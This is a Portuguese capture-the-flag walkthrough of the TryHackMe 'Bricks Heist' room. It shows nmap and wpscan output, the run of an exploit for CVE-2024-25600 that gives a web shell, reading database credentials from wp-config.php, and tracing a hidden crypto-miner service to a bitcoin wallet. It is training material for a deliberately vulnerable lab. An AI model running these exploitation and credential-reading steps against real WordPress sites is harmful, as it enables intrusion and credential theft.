TryHack3M: Bricks Heist

TryHack3M: Bricks HeistTryHackMe

Classificação : Fácil

Criadores : umairalizafar, ujohn, l000g1c

Ferramentas : nmap, wpscan

Adicionar bricks.thm no arquivo /etc/hosts

$ echo '10.10.31.7 bricks.thm' >> /etc/hosts

Enumeração

Enumeração de portas com o nmap

# nmap -sS -sV -Pn bricks.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-27 19:30 UTC
Nmap scan report for bricks.thm (10.10.31.7)
Host is up (0.0071s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     WebSockify Python/3.8.10
443/tcp  open  ssl/http Apache httpd
3306/tcp open  mysql    MySQL (unauthorized)

Visitamos o site https://bricks.thm/ mas não havia nada exceto um tijolo, notamos que o site usa o cms wordpress

Depois de identificar o cms, devemos verificar o site com o wpscan

# wpscan --url https://bricks.thm/ --disable-tls-checks
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: https://bricks.thm/ [10.10.31.7]
[+] Started: Mon May 27 19:53:12 2024
                                  ...SNIP...
[+] WordPress theme in use: bricks
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.9.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://bricks.thm/wp-content/themes/bricks/style.css, Match: 'Version: 1.9.5'

Identifcamos a versão do tema usado pelo site bricks 1.9.5 e pesquisamos por um exploit no google, e baixamos o exploit

Executamos o exploit

# python3 exploit.py -u https://bricks.thm/
[*] Nonce found: 9492f77962
[+] https://bricks.thm/ is vulnerable to CVE-2024-25600, apache
[!] Shell is ready, please type your commands UwU
# ls
650c844110baced87e1606453b93f22a.txt
                                ...SNIP...

O arquivo wp-config.php nos revela as credencias de acesso

# cat wp-config.php

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '<REDACTED>' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

Para usar isso, pode-se acessar https://bricks.thm/phpmyadmine fazer login com estas credenciais:

Dará acesso ao portal de administração de onde é possível alterar as configurações, fazer login no painel wp-admin e muito mais.

Procuramos por processos em execução no momento, rodamos o comando no terminal na máquina comprometida

systemctl --type=service --state=running

Após listar os processos, descobrimos um processo estranho

  ubuntu.service                                 loaded active running TRYHACK3M                                                       

Isso fornece o nome do serviço afiliado ao processo suspeito.

#systemctl cat ubuntu.service
# /etc/systemd/system/ubuntu.service
[Unit]
Description=TRYHACK3M

[Service]
Type=simple
ExecStart=/lib/NetworkManager/<REDACTED>
Restart=on-failure

[Install]
WantedBy=multi-user.target 

O serviço está sendo executado no arquivo /lib/NetworkManager

# head  /lib/NetworkManager/inet.conf

ID:5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2024-04-08 10:46:04,743 [*] confbak: Ready!
2024-04-08 10:46:04,743 [*] Status: Mining!
2024-04-08 10:46:08,745 [*] Miner()

Estava mostrando todos os logs armazenados o que confirma que o arquivo de log que estamos pesquisando é para a instância do minerador é inet.conf.

Vamos copiá-lo e tentar decodificá-lo no Cyberchef :

Aqui, algo era incomum. Podemos ver os termos repetindo-os depois de um certo ponto. Desde então, estamos em busca do endereço da carteira.

O endereço que temos é maior que 62. Então dividi eles em duas partes:

bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa
bc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa

Podemos verificar online se o endereço é válido ou não. Entrei em blockchair.com e colei o endereço provável para pesquisar:

O endereço é válido, descendo para o final da página, nos revela uma transação, e vericamos isso com mais detalhes

Podemos ver os detalhes das transações, como remetente e destinatário:

Basta copiar o endereço do remetente e pesquisar no Google:

Neste primeiro link, descobriremos a última resposta, FIM!